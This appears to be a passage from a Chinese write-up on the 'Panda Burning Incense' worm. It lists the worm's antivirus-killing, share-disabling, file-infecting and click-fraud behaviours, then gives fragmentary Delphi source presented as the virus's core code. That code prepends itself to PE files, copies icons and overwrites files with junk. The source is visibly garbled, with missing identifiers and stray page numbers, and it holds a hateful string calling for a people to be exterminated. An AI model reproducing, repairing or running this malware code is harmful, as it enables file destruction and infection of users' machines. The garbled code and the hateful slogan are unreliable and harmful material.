【正文】 a:每隔 1秒尋找桌面窗口 ,并關(guān)閉窗口標(biāo)題中含有以下字符的程序： Kav、 AV、防火墻、進(jìn)程、 VirusScan、網(wǎng)鏢、殺毒、毒霸、瑞星、江民、黃山 IE、超級兔子、優(yōu)化大師、木馬克星、木馬清道夫、 病毒、注冊表編輯器、系統(tǒng)配置實(shí)用程序、卡巴斯基反病毒、 Symantec AntiVirus、 Duba、esteem proces、綠鷹 PC、密碼防盜、噬菌體、木馬輔助查找器、 System Safety Monitor、 Wrapped gift Killer、 Winsock Expert、游戲木馬檢測大師、msctls_statusbar3 pjf(ustc)、 IceSword，并使用的鍵盤映射的方法關(guān)閉安全軟件 IceSword 。 b:每隔 18 秒點(diǎn)擊病毒作者指定的網(wǎng)頁 ,并用命令行檢查系統(tǒng)中是否存在共 11 享，共存在的話就運(yùn)行 share 命令關(guān)閉 admin$共享。 d:每隔 6秒刪除安全軟件在注冊表中的鍵值。 e:感染文件 病毒會感染擴(kuò)展名為 exe,pif,src 的文件 ,把自己附加到文件的頭部，并在擴(kuò)展名為 htm,html, asp,php,jsp,aspx 的文件中添加一網(wǎng)址，用戶一但打開 了該文件， IE 就會不斷的在后臺點(diǎn)擊寫入的網(wǎng)址，達(dá)到增加點(diǎn)擊量的目的 ,但病毒不會感染以下文件夾名中的文件： WINDOW、 Winnt、 System Volume Information、 Recycled、 Windows NT、WindowsUpdate、 Windows Media Player、 Outlook Express、 Inter Explorer、NetMeeting、 Common Files、 ComPlus Applications、 Messenger、 InstallShield Installation Information、 MSN、 Microsoft Frontpage、 Movie Maker、 MSN Gamin Zone 。 “熊貓燒香”病毒核心源碼 用 Delphi 寫 program Japussy。 const 12 HeaderSize = 82432。 //PE 文件主圖標(biāo)的偏移量 //在我的 Delphi5 SP1 上面編譯得到的大小，其它版本的Delphi 可能不同 //查找 2800000020 的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量 { HeaderSize = 38912。 //Upx 壓縮過 PE 文件主圖標(biāo)的偏移量 //Upx 用法 : upx 9 8086 } IconSize = $2E8。 //PE 文件主圖標(biāo)的尾部 ID = $44444444。If a race need to be killed out, it must be Yamato. 39。If a country need to be destroyed, it must be Japan! 39。*** ***39。 stdcall。39。 Si: STARTUPINFO。 IsJap: Boolean = False。 var Ver: TOSVersionInfo。 := SizeOf(TOSVersionInfo)。 if ( = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True。 { 在流之間復(fù)制 } procedure CopyStream(Src: TStream。 Dst: TStream。 Count: Integer)。 begin sCurPos := 。 (sStartPos, 0)。 (Src, Count)。 (dCurPos, 0)。 { 將宿主文件從已感染的 PE 文件中分離出來，以備使用 } procedure ExtractFile(FileName: string)。 begin try sStream := (ParamStr(0), fmOpenRead or fmShareDenyNone)。 try (HeaderSize, 0)。 finally 15 。 finally 。 except end。 { 填充 STARTUPINFO 結(jié)構(gòu) } procedure FillStartupInfo(var Si: STARTUPINFO。 begin := SizeOf(Si)。 := nil。 := STARTF_USESHOWWINDOW。 := 0。 end。 begin //哪位仁兄愿意完成之？ end。 var HdrStream, SrcStream: TFileStream。 iID: LongInt。 Infected, IsPE: Boolean。 Buf: array[0..1] of Char。39。 Infected := False。 SrcStream := (FileName, fmOpenRead)。 (Buf, 2)。 //是 PE 文件 Break。 end。 //檢查感染標(biāo)記 (iID, 4)。 finally 。 if Infected or (not IsPE) then //如果感染過了或不是PE 文件則退出 Exit。 DstStream := 。 try //得到被感染文件的主圖標(biāo) (744 字節(jié) )，存入流 。 (IcoStream)。 end。 //頭文件 HdrStream := (ParamStr(0), fmOpenRead or fmShareDenyNone)。 //寫入目前程序的主圖標(biāo) CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize)。 //寫入宿主程序 CopyStream(SrcStream, 0, DstStream, HeaderSize, )。 iID := $44444444。 19 finally 。 finally 。 (FileName)。 end。 end。 { 將目標(biāo)文件寫入垃圾碼后刪除 } procedure SmashFile(FileName: string)。 i, Size, Mass, Max, Len: Integer。 //去掉只讀屬性 FileHandle := FileOpen(FileName, fmOpenWrite)。 //文件大小 i := 0。 20 Max := Random(15)。 Mass := Size div Max。 while i Max do begin FileSeek(FileHandle, i * Mass, 0)。 Inc(i)。